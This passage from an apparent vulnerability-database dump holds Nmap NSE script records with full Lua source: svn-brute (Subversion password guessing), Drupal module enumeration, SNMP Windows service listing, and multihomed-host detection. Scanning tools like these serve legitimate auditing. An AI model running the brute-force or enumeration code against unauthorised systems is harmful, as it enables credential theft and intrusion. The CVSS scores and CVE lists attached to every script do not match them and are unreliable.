\"openssl\"\n\ndescription = [[\nPerforms brute force password auditing against Subversion source code control servers.\n]]\n\n---\n-- @usage\n-- nmap --script svn-brute --script-args svn-brute.repo=/svn/ -p 3690 <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 3690/tcp open svn syn-ack\n-- | svn-brute:\n-- | Accounts\n-- |_ patrik:secret => Login correct\n--\n-- Summary\n-- -------\n-- x The svn class contains the code needed to perform CRAM-MD5\n-- authentication\n-- x The Driver class contains the driver implementation used by the brute\n-- library\n--\n-- @args svn-brute.repo the Subversion repository against which to perform\n-- password guessing\n-- @args svn-brute.force force password guessing when service is accessible\n-- both anonymously and through authentication\n\n--\n-- Version 0.1\n-- Created 07/12/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n--\n\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"brute\"}\n\nportrule = shortport.port_or_service(3690, \"svnserve\", \"tcp\", \"open\")\n\nsvn =\n{\n svn_client = \"nmap-brute v0.1\",\n\n new = function(self, host, port, repo)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.repo = repo\n o.invalid_users = {}\n return o\n end,\n\n --- Connects to the SVN - repository\n --\n -- @return status true on success, false on failure\n -- @return err string containing an error message on failure\n connect = function(self)\n local repo_url = ( \"svn://%s/%s\" ):format(self.host.ip, self.repo)\n local status, msg\n\n self.socket = brute.new_socket()\n\n local result\n status, result = self.socket:connect(self.host, self.port)\n if( not(status) ) then\n return false, result\n end\n\n status, msg = self.socket:receive_bytes(1)\n if ( not(status) or not( msg:match(\"^%( success\") ) ) then\n return false, \"Banner reports failure\"\n end\n\n msg = (\"( 2 ( edit-pipeline svndiff1 absent-entries depth mergeinfo log-revprops ) %d:%s %d:%s ( ) ) \"):format( #repo_url, repo_url, #self.svn_client, self.svn_client )\n status = self.socket:send( msg )\n if ( not(status) ) then\n return false, \"Send failed\"\n end\n\n status, msg = self.socket:receive_bytes(1)\n if ( not(status) ) then\n return false, \"Receive failed\"\n end\n\n if ( msg:match(\"%( success\") ) then\n local tmp = msg:match(\"%( success %( %( ([%S+%s*]-) %)\")\n if ( not(tmp) ) then return false, \"Failed to detect authentication\" end\n tmp = stringaux.strsplit(\" \", tmp)\n self.auth_mech = {}\n for _, v in pairs(tmp) do self.auth_mech[v] = true end\n elseif ( msg:match(\"%( failure\") ) then\n return false\n end\n\n return true\n end,\n\n --- Attempts to login to the SVN server\n --\n -- @param username string containing the login username\n -- @param password string containing the login password\n -- @return status, true on success, false on failure\n -- @return err string containing error message on failure\n login = function( self, username, password )\n local status, msg\n local challenge, digest\n\n if ( self.auth_mech[\"CRAM-MD5\"] ) then\n msg = \"( CRAM-MD5 ( ) ) \"\n status = self.socket:send( msg )\n\n status, msg = self.socket:receive_bytes(1)\n if ( not(status) ) then\n return false, \"error\"\n end\n\n challenge = msg:match(\"<.+>\")\n\n if ( not(challenge) ) then\n return false, \"Failed to read challenge\"\n end\n\n digest = stdnse.tohex(openssl.hmac('md5', password, challenge))\n msg = (\"%d:%s %s \"):format(#username + 1 + #digest, username, digest)\n self.socket:send( msg )\n\n status, msg = self.socket:receive_bytes(1)\n if ( not(status) ) then\n return false, \"error\"\n end\n\n if ( msg:match(\"Username not found\") ) then\n return false, \"Username not found\"\n elseif ( msg:match(\"success\") ) then\n return true, \"Authentication success\"\n else\n return false, \"Authentication failed\"\n end\n else\n return false, \"Unsupported auth-mechanism\"\n end\n\n end,\n\n --- Close the SVN connection\n --\n -- @return status true on success, false on failure\n close = function(self)\n return self.socket:close()\n end,\n\n}\n\n\nDriver =\n{\n new = function(self, host, port, invalid_users )\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.host = host\n o.port = port\n o.repo = stdnse.get_script_args('svn-brute.repo')\n o.invalid_users = invalid_users\n return o\n end,\n\n connect = function( self )\n local status, msg\n\n self.svn = svn:new( self.host, self.port, self.repo )\n status, msg = self.svn:connect()\n if ( not(status) ) then\n local err = brute.Error:new( \"Failed to connect to SVN server\" )\n -- This might be temporary, set the retry flag\n err:setRetry( true )\n return false, err\n end\n\n return true\n end,\n\n disconnect = function( self )\n self.svn:close()\n end,\n\n --- Attempts to login to the SVN server\n --\n -- @param username string containing the login username\n -- @param password string containing the login password\n -- @return status, true on success, false on failure\n -- @return brute.Error object on failure\n -- creds.Account object on success\n login = function( self, username, password )\n local status, msg\n\n if ( self.invalid_users[username] ) then\n return false, brute.Error:new( \"User is invalid\" )\n end\n\n status, msg = self.svn:login( username, password )\n\n if ( not(status) and msg:match(\"Username not found\") ) then\n self.invalid_users[username] = true\n return false, brute.Error:new(\"Username not found\")\n elseif ( status and msg:match(\"success\") ) then\n return true, creds.Account:new(username, password, creds.State.VALID)\n else\n return false, brute.Error:new( \"Incorrect password\" )\n end\n end,\n\n --- Verifies whether the repository is valid\n --\n -- @return status, true on success, false on failure\n -- @return err string containing an error message on failure\n check = function( self )\n local svn = svn:new( self.host, self.port, self.repo )\n local status = svn:connect()\n\n svn:close()\n\n if ( status ) then\n return true\n else\n return false, (\"Failed to connect to SVN repository (%s)\"):format(self.repo)\n end\n end,\n}\n\n\n\naction = function(host, port)\n local status, accounts\n\n local repo = stdnse.get_script_args('svn-brute.repo')\n local force = stdnse.get_script_args('svn-brute.force')\n\n if ( not(repo) ) then\n return \"No repository specified (see svn-brute.repo)\"\n end\n\n local svn = svn:new( host, port, repo )\n local status = svn:connect()\n\n if ( status and svn.auth_mech[\"ANONYMOUS\"] and not(force) ) then\n return \" \\n Anonymous SVN detected, no authentication needed\"\n end\n\n if ( not(svn.auth_mech) or not( svn.auth_mech[\"CRAM-MD5\"] ) ) then\n return \" \\n No supported authentication mechanisms detected\"\n end\n\n local invalid_users = {}\n local engine = brute.Engine:new(Driver, host, port, invalid_users)\n engine.options.script_name = SCRIPT_NAME\n status, accounts = engine:start()\n if( not(status) ) then\n return accounts\n end\n\n return accounts\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:44:01", "description": "Enumerates the installed Drupal modules/themes by using a list of known modules and themes. \n\nThe script works by iterating over module/theme names and requesting MODULE_PATH/MODULE_NAME/LICENSE.txt for modules and THEME_PATH/THEME_NAME/LICENSE.txt. MODULE_PATH/THEME_PATH which is either provided by the user, grepped for in the html body or defaulting to sites/all/modules/. \n\nIf the response status code is 200, it means that the module/theme is installed. By default, the script checks for the top 100 modules/themes (by downloads), given the huge number of existing modules (~18k) and themes(~1.4k). \n\nIf you want to update your themes or module list refer to the link below. \n\n * <https://svn.nmap.org/nmap-exp/gyani/misc/drupal-update.py>\n\n### See also:\n\n * [ http-vuln-cve2014-3704.nse ](<../scripts/http-vuln-cve2014-3704.html>)\n\n## Script Arguments \n\n#### http-drupal-enum.themes_path \n\nDirect Path for Themes\n\n#### http-drupal-enum.number \n\nNumber of modules to check. Use this option with a number or \"all\" as an argument to test for all modules. Defaults to `100`.\n\n#### http-drupal-enum.type \n\ndefault all.choose between \"themes\" and \"modules\"\n\n#### http-drupal-enum.root \n\nThe base path. Defaults to `/`.\n\n#### http-drupal-enum.modules_path \n\nDirect Path for Modules\n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -p 80 --script http-drupal-enum <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 80/tcp open http syn-ack\n | http-drupal-enum:\n | Themes:\n | adaptivetheme\n | Modules:\n | views\n | token\n | ctools\n | pathauto\n | date\n | imce\n |_ webform\n \n Final times for host: srtt: 329644 rttvar: 185712 to: 1072492\n \n\n## Requires \n\n * [coroutine](<>)\n * [http](<../lib/http.html>)\n * [io](<>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [table](<>)\n * [rand](<../lib/rand.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-08-13T11:58:44", "type": "nmap", "title": "http-drupal-enum NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-01-30T03:09:56", "id": "NMAP:HTTP-DRUPAL-ENUM.NSE", "href": "https://nmap.org/nsedoc/scripts/http-drupal-enum.html", "sourceData": "local coroutine = require \"coroutine\"\nlocal http = require \"http\"\nlocal io = require \"io\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal rand = require \"rand\"\n\ndescription = [[\nEnumerates the installed Drupal modules/themes by using a list of known modules and themes.\n\nThe script works by iterating over module/theme names and requesting\nMODULE_PATH/MODULE_NAME/LICENSE.txt for modules and THEME_PATH/THEME_NAME/LICENSE.txt.\nMODULE_PATH/THEME_PATH which is either provided by the user, grepped for in the html body\nor defaulting to sites/all/modules/.\n\nIf the response status code is 200, it means that the module/theme is installed. By\ndefault, the script checks for the top 100 modules/themes (by downloads), given the\nhuge number of existing modules (~18k) and themes(~1.4k).\n\nIf you want to update your themes or module list refer to the link below.\n\n* https://svn.nmap.org/nmap-exp/gyani/misc/drupal-update.py\n]]\n\n---\n-- @see http-vuln-cve2014-3704.nse\n--\n-- @args http-drupal-enum.root The base path. Defaults to <code>/</code>.\n-- @args http-drupal-enum.number Number of modules to check.\n-- Use this option with a number or \"all\" as an argument to test for all modules.\n-- Defaults to <code>100</code>.\n-- @args http-drupal-enum.modules_path Direct Path for Modules\n-- @args http-drupal-enum.themes_path Direct Path for Themes\n-- @args http-drupal-enum.type default all.choose between \"themes\" and \"modules\"\n--\n-- @usage nmap -p 80 --script http-drupal-enum <target>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 80/tcp open http syn-ack\n-- | http-drupal-enum:\n-- | Themes:\n-- | adaptivetheme\n-- | Modules:\n-- | views\n-- | token\n-- | ctools\n-- | pathauto\n-- | date\n-- | imce\n-- |_ webform\n--\n-- Final times for host: srtt: 329644 rttvar: 185712 to: 1072492\n--\n-- @xmloutput\n-- <table key=\"Themes\">\n-- <elem>adaptivetheme</elem>\n-- </table>\n-- <table key=\"Modules\">\n-- <elem>views</elem>\n-- <elem>token</elem>\n-- <elem>ctools</elem>\n-- <elem>pathauto</elem>\n-- <elem>date</elem>\n-- <elem>imce</elem>\n-- <elem>webform</elem>\n-- </table>\n\n\nauthor = {\n \"Hani Benhabiles\",\n \"Gyanendra Mishra\",\n}\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\n \"discovery\",\n \"intrusive\",\n}\n\nlocal DEFAULT_SEARCH_LIMIT = 100\nlocal DEFAULT_MODULES_PATH = 'sites/all/modules/'\nlocal DEFAULT_THEMES_PATH = 'sites/all/themes/'\nlocal IDENTIFICATION_STRING = \"GNU GENERAL PUBLIC LICENSE\"\n\nportrule = shortport.http\n\n--Reads database\nlocal function read_data (file)\n return coroutine.wrap(function ()\n for line in file:lines() do\n if not line:match \"^%s*#\" and not line:match \"^%s*$\" then\n coroutine.yield(line)\n end\n end\n end)\nend\n\n--Checks if the module/theme file exists\nlocal function assign_file (act_file)\n if not act_file then\n return false\n end\n local temp_file = io.open(act_file, \"r\")\n if not temp_file then\n return false\n end\n return temp_file\nend\n\n--- Attempts to find modules path\nlocal get_path = function (host, port, root, type_of)\n local default_path\n if type_of == \"themes\" then\n default_path = DEFAULT_THEMES_PATH\n else\n default_path = DEFAULT_MODULES_PATH\n end\n local body = http.get(host, port, root).body or \"\"\n local pattern = \"sites/[%w.-/]*/\" .. type_of .. \"/\"\n local found_path = body:match(pattern)\n return found_path or default_path\nend\n\n\nfunction action (host, port)\n local result = stdnse.output_table()\n local file = {}\n local all = {}\n local requests = {}\n local method = \"HEAD\"\n\n --Read script arguments\n local resource_type = stdnse.get_script_args(SCRIPT_NAME .. \".type\") or \"all\"\n local root = stdnse.get_script_args(SCRIPT_NAME .. \".root\") or \"/\"\n local search_limit = stdnse.get_script_args(SCRIPT_NAME .. \".number\") or DEFAULT_SEARCH_LIMIT\n local themes_path = stdnse.get_script_args(SCRIPT_NAME .. \".themes_path\")\n local modules_path = stdnse.get_script_args(SCRIPT_NAME .. \".modules_path\")\n\n local themes_file = nmap.fetchfile \"nselib/data/drupal-themes.lst\"\n local modules_file = nmap.fetchfile \"nselib/data/drupal-modules.lst\"\n\n if resource_type == \"themes\" or resource_type == \"all\" then\n local theme_db = assign_file(themes_file)\n if not theme_db then\n return false, \"Couldn't find drupal-themes.lst in /nselib/data/\"\n else\n file['Themes'] = theme_db\n end\n end\n\n if resource_type == \"modules\" or resource_type == \"all\" then\n local modules_db = assign_file(modules_file)\n if not modules_db then\n return false, \"Couldn't find drupal-modules.lst in /nselib/data/\"\n else\n file['Modules'] = modules_db\n end\n end\n\n if search_limit == \"all\" then\n search_limit = nil\n else\n search_limit = tonumber(search_limit)\n end\n\n if not themes_path then\n themes_path = (root .. get_path(host, port, root, \"themes\")):gsub(\"//\", \"/\")\n end\n if not modules_path then\n modules_path = (root .. get_path(host, port, root, \"modules\")):gsub(\"//\", \"/\")\n end\n\n -- We default to HEAD requests unless the server returns\n -- non 404 (200 or other) status code\n\n local response = http.head(host, port, modules_path .. rand.random_alpha(8) .. \"/LICENSE.txt\")\n if response.status ~= 404 then\n method = \"GET\"\n end\n\n for key, value in pairs(file) do\n local count = 0\n for resource_name in read_data(value) do\n count = count + 1\n if search_limit and count > search_limit then\n break\n end\n -- add request to pipeline\n if key == \"Modules\" then\n all = http.pipeline_add(modules_path .. resource_name .. \"/LICENSE.txt\", nil, all, method)\n else\n all = http.pipeline_add(themes_path .. resource_name .. \"/LICENSE.txt\", nil, all, method)\n end\n -- add to requests buffer\n table.insert(requests, resource_name)\n end\n\n -- send requests\n local pipeline_responses = http.pipeline_go(host, port, all)\n if not pipeline_responses then\n stdnse.print_debug(1, \"No answers from pipelined requests\")\n return nil\n end\n\n for i, response in ipairs(pipeline_responses) do\n -- Module exists if 200 on HEAD.\n -- A lot Drupal of instances return 200 for all GET requests,\n -- hence we check for the identifcation string.\n if response.status == 200 and (method == \"HEAD\" or (method == \"GET\" and response.body:match(IDENTIFICATION_STRING))) then\n result[key] = result[key] or {}\n table.insert(result[key], requests[i])\n end\n end\n requests = {}\n all = {}\n end\n\n if result['Themes'] or result['Modules'] then\n return result\n else\n if nmap.verbosity() > 1 then\n return string.format(\"Nothing found amongst the top %s resources,\" .. \"use --script-args number=<number|all> for deeper analysis)\", search_limit)\n else\n return nil\n end\n end\n\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:26", "description": "Attempts to enumerate Windows services through SNMP.\n\n## Script Arguments \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### snmp.version \n\nSee the documentation for the [snmp](<../lib/snmp.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sU -p 161 --script=snmp-win32-services <target>\n\n## Script Output \n \n \n | snmp-win32-services:\n | Apache Tomcat\n | Application Experience Lookup Service\n | Application Layer Gateway Service\n | Automatic Updates\n | COM+ Event System\n | COM+ System Application\n | Computer Browser\n | Cryptographic Services\n | DB2 - DB2COPY1 - DB2\n | DB2 Management Service (DB2COPY1)\n | DB2 Remote Command Server (DB2COPY1)\n | DB2DAS - DB2DAS00\n |_ DCOM Server Process Launcher\n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [snmp](<../lib/snmp.html>)\n * [table](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2010-02-16T09:15:38", "type": "nmap", "title": "snmp-win32-services NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-07-27T03:32:27", "id": "NMAP:SNMP-WIN32-SERVICES.NSE", "href": "https://nmap.org/nsedoc/scripts/snmp-win32-services.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal snmp = require \"snmp\"\nlocal table = require \"table\"\n\ndescription = [[\nAttempts to enumerate Windows services through SNMP.\n]]\n\n---\n-- @usage\n-- nmap -sU -p 161 --script=snmp-win32-services <target>\n-- @output\n-- | snmp-win32-services:\n-- | Apache Tomcat\n-- | Application Experience Lookup Service\n-- | Application Layer Gateway Service\n-- | Automatic Updates\n-- | COM+ Event System\n-- | COM+ System Application\n-- | Computer Browser\n-- | Cryptographic Services\n-- | DB2 - DB2COPY1 - DB2\n-- | DB2 Management Service (DB2COPY1)\n-- | DB2 Remote Command Server (DB2COPY1)\n-- | DB2DAS - DB2DAS00\n-- |_ DCOM Server Process Launcher\n-- @xmloutput\n-- <elem>Apache Tomcat</elem>\n-- <elem>Application Experience Lookup Service</elem>\n-- <elem>Application Layer Gateway Service</elem>\n-- <elem>Automatic Updates</elem>\n-- <elem>COM+ Event System</elem>\n-- <elem>COM+ System Application</elem>\n-- <elem>Computer Browser</elem>\n-- <elem>Cryptographic Services</elem>\n-- <elem>DB2 - DB2COPY1 - DB2</elem>\n-- <elem>DB2 Management Service (DB2COPY1)</elem>\n-- <elem>DB2 Remote Command Server (DB2COPY1)</elem>\n-- <elem>DB2DAS - DB2DAS00</elem>\n-- <elem>DCOM Server Process Launcher</elem>\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\", \"discovery\", \"safe\"}\ndependencies = {\"snmp-brute\"}\n\n-- Version 0.3\n-- Created 01/15/2010 - v0.1 - created by Patrik Karlsson <patrik@cqure.net>\n-- Revised 01/19/2010 - v0.2 - fixed loop that would occur if a mib did not exist\n-- Revised 04/11/2010 - v0.3 - moved snmp_walk to snmp library <patrik@cqure.net>\n\n\nportrule = shortport.port_or_service(161, \"snmp\", \"udp\", {\"open\", \"open|filtered\"})\n\n\n--- Processes the table and creates the script output\n--\n-- @param tbl table containing <code>oid</code> and <code>value</code>\n-- @return table containing just the values\nlocal function process_answer( tbl )\n\n local new_tab = {}\n\n for _, v in ipairs( tbl ) do\n table.insert( new_tab, v.value )\n end\n\n table.sort( new_tab )\n\n return new_tab\n\nend\n\naction = function(host, port)\n\n local snmpoid = \"1.3.6.1.4.1.77.1.2.3.1.1\"\n local services = {}\n local status\n\n local snmpHelper = snmp.Helper:new(host, port)\n snmpHelper:connect()\n\n status, services = snmpHelper:walk( snmpoid )\n\n if ( not(status) ) or ( services == nil ) or ( #services == 0 ) then\n return\n end\n\n services = process_answer(services)\n nmap.set_port_state(host, port, \"open\")\n\n return services\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:45:31", "description": "Attempts to discover multihomed systems by analysing and comparing information collected by other scripts. The information analyzed currently includes, SSL certificates, SSH host keys, MAC addresses, and Netbios server names. \n\nIn order for the script to be able to analyze the data it has dependencies to the following scripts: ssl-cert,ssh-hostkey,nbtstat. \n\nOne or more of these scripts have to be run in order to allow the duplicates script to analyze the data.\n\n## Example Usage \n \n \n sudo nmap -PN -p445,443 --script duplicates,nbstat,ssl-cert <ips>\n \n\n## Script Output \n \n \n | duplicates:\n | ARP\n | MAC: 01:23:45:67:89:0a\n | 192.168.99.10\n | 192.168.99.11\n | Netbios\n | Server Name: WIN2KSRV001\n | 192.168.0.10\n |_ 192.168.1.10\n \n\n## Requires \n\n * [ipOps](<../lib/ipOps.html>)\n * [nmap](<../lib/nmap.html>)\n * [ssh1](<../lib/ssh1.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [table](<>)\n * [tableaux](<../lib/tableaux.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-03-12T22:24:58", "type": "nmap", "title": "duplicates NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-11-06T15:07:01", "id": "NMAP:DUPLICATES.NSE", "href": "https://nmap.org/nsedoc/scripts/duplicates.html", "sourceData": "local ipOps = require \"ipOps\"\nlocal nmap = require \"nmap\"\nlocal ssh1 = require \"ssh1\"\nlocal stdnse = require \"stdnse\"\nlocal table = require \"table\"\nlocal tableaux = require \"tableaux\"\n\ndescription = [[\nAttempts to discover multihomed systems by analysing and comparing\ninformation collected by other scripts. The information analyzed\ncurrently includes, SSL certificates, SSH host keys, MAC addresses,\nand Netbios server names.\n\nIn order for the script to be able to analyze the data it has dependencies to\nthe following scripts: ssl-cert,ssh-hostkey,nbtstat.\n\nOne or more of these scripts have to be run in order to allow the duplicates\nscript to analyze the data.\n]]\n\n---\n-- @usage\n-- sudo nmap -PN -p445,443 --script duplicates,nbstat,ssl-cert <ips>\n--\n-- @output\n-- | duplicates:\n-- | ARP\n-- | MAC: 01:23:45:67:89:0a\n-- | 192.168.99.10\n-- | 192.168.99.11\n-- | Netbios\n-- | Server Name: WIN2KSRV001\n-- | 192.168.0.10\n-- |_ 192.168.1.10\n--\n\n\n--\n-- While the script provides basic duplicate functionality, here are some ideas\n-- on improvements.\n--\n-- Possible additional information sources:\n-- * Microsoft SQL Server instance names (Match hostname, version, instance\n-- names and ports) - Reliable given several instances\n-- * Oracle TNS names - Not very reliable\n--\n-- Possible enhancements:\n-- * Compare hosts across information sources and create a global category\n-- in which system duplicates are reported based on more than one source.\n-- * Add a reliability index for each information source that indicates how\n-- reliable the duplicate match was. This could be an index compared to\n-- other information sources as well as an indicator of how good the match\n-- was for a particular information source.\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\"}\ndependencies = {\"ssl-cert\", \"ssh-hostkey\", \"nbstat\"}\n\n\nhostrule = function() return true end\npostrule = function() return true end\n\nlocal function processSSLCerts(tab)\n\n -- Handle SSL-certificates\n -- We create a new table using the SHA1 digest as index\n local ssl_certs = {}\n for host, v in pairs(tab) do\n for port, sha1 in pairs(v) do\n ssl_certs[sha1] = ssl_certs[sha1] or {}\n if ( not tableaux.contains(ssl_certs[sha1], host.ip) ) then\n table.insert(ssl_certs[sha1], host.ip)\n end\n end\n end\n\n local results = {}\n for sha1, hosts in pairs(ssl_certs) do\n table.sort(hosts, function(a, b) return ipOps.compare_ip(a, \"lt\", b) end)\n if ( #hosts > 1 ) then\n table.insert(results, { name = (\"Certficate (%s)\"):format(sha1), hosts } )\n end\n end\n\n return results\nend\n\nlocal function processSSHKeys(tab)\n\n local hostkeys = {}\n\n -- create a reverse mapping key_fingerprint -> host(s)\n for ip, keys in pairs(tab) do\n for _, key in ipairs(keys) do\n local fp = ssh1.fingerprint_hex(key.fingerprint, key.algorithm, key.bits)\n if not hostkeys[fp] then\n hostkeys[fp] = {}\n end\n -- discard duplicate IPs\n if not tableaux.contains(hostkeys[fp], ip) then\n table.insert(hostkeys[fp], ip)\n end\n end\n end\n\n -- look for hosts using the same hostkey\n local results = {}\n for key, hosts in pairs(hostkeys) do\n if #hostkeys[key] > 1 then\n table.sort(hostkeys[key], function(a, b) return ipOps.compare_ip(a, \"lt\", b) end)\n local str = 'Key ' .. key .. ':'\n table.insert( results, { name = str, hostkeys[key] } )\n end\n end\n\n return results\nend\n\nlocal function processNBStat(tab)\n\n local results, mac_table, name_table = {}, {}, {}\n for host, v in pairs(tab) do\n mac_table[v.mac] = mac_table[v.mac] or {}\n if ( not(tableaux.contains(mac_table[v.mac], host.ip)) ) then\n table.insert(mac_table[v.mac], host.ip)\n end\n\n name_table[v.server_name] = name_table[v.server_name] or {}\n if ( not(tableaux.contains(name_table[v.server_name], host.ip)) ) then\n table.insert(name_table[v.server_name], host.ip)\n end\n end\n\n for mac, hosts in pairs(mac_table) do\n if ( #hosts > 1 ) then\n table.sort(hosts, function(a, b) return ipOps.compare_ip(a, \"lt\", b) end)\n table.insert(results, { name = (\"MAC: %s\"):format(mac), hosts })\n end\n end\n\n for srvname, hosts in pairs(name_table) do\n if ( #hosts > 1 ) then\n table.sort(hosts, function(a, b) return ipOps.compare_ip(a, \"lt\", b) end)\n table.insert(results, { name = (\"Server Name: %s\"):format(srvname), hosts })\n end\n end\n\n return results\nend\n\nlocal function processMAC(tab)\n\n local mac\n local mac_table = {}\n\n for host in pairs(tab) do\n if ( host.mac_addr ) then\n mac = stdnse.format_mac(host.mac_addr)\n mac_table[mac] = mac_table[mac] or {}\n if ( not(tableaux.contains(mac_table[mac], host.ip)) ) then\n table.insert(mac_table[mac], host.ip)\n end\n end\n end\n\n local results = {}\n for mac, hosts in pairs(mac_table) do\n if ( #hosts > 1 ) then\n table.sort(hosts, function(a, b) return ipOps.compare_ip(a, \"lt\", b) end)\n table.insert(results, { name = (\"MAC: %s\"):format(mac), hosts })\n end\n end\n\n return results\nend\n\npostaction = function()\n\n local handlers = {\n ['ssl-cert'] = { func = processSSLCerts, name = \"SSL\" },\n ['sshhostkey'] = { func = processSSHKeys, name = \"SSH\" },\n ['nbstat'] = { func = processNBStat, name = \"Netbios\" },\n ['mac'] = { func = processMAC, name = \"ARP\" }\n }\n\n -- temporary re-allocation code for SSH keys\n for k, v in pairs(nmap.registry.sshhostkey or {}) do\n nmap.registry['duplicates'] = nmap.registry['duplicates'] or {}\n nmap.registry['duplicates']['sshhostkey'] = nmap.registry['duplicates']['sshhostkey'] or {}\n nmap.registry['duplicates']['sshhostkey'][k] = v\n end\n\n if ( not(nmap.registry['duplicates']) ) then\n return\n end\n\n local results = {}\n for key, handler in pairs(handlers) do\n if ( nmap.registry['duplicates'][key] ) then\n local result_part = handler.func( nmap.registry['duplicates'][key] )\n if ( result_part and #result_part > 0 ) then\n table.insert(results, { name = handler.name, result_part } )\n end\n end\n end\n\n return stdnse.format_output(true, results)\nend\n\n-- we have no real action in here. In essence we move information from the\n-- host based registry to the global one, so that our postrule has access to\n-- it when we need it.\nhostaction = function(host)\n\n nmap.registry['duplicates'] = nmap.registry['duplicates'] or {}\n\n for port, cert in pairs(host.registry[\"ssl-cert\"] or {}) do\n nmap.registry['duplicates']['ssl-cert'] = nmap.registry['duplicates']['ssl-cert'] or {}\n nmap.registry['duplicates']['ssl-cert'][host] = nmap.registry['duplicates']['ssl-cert'][host] or {}\n nmap.registry['duplicates']['ssl-cert'][host][port] = stdnse.tohex(cert:digest(\"sha1\"), { separator = \" \", group = 4 })\n end\n\n if ( host.registry['nbstat'] ) then\n 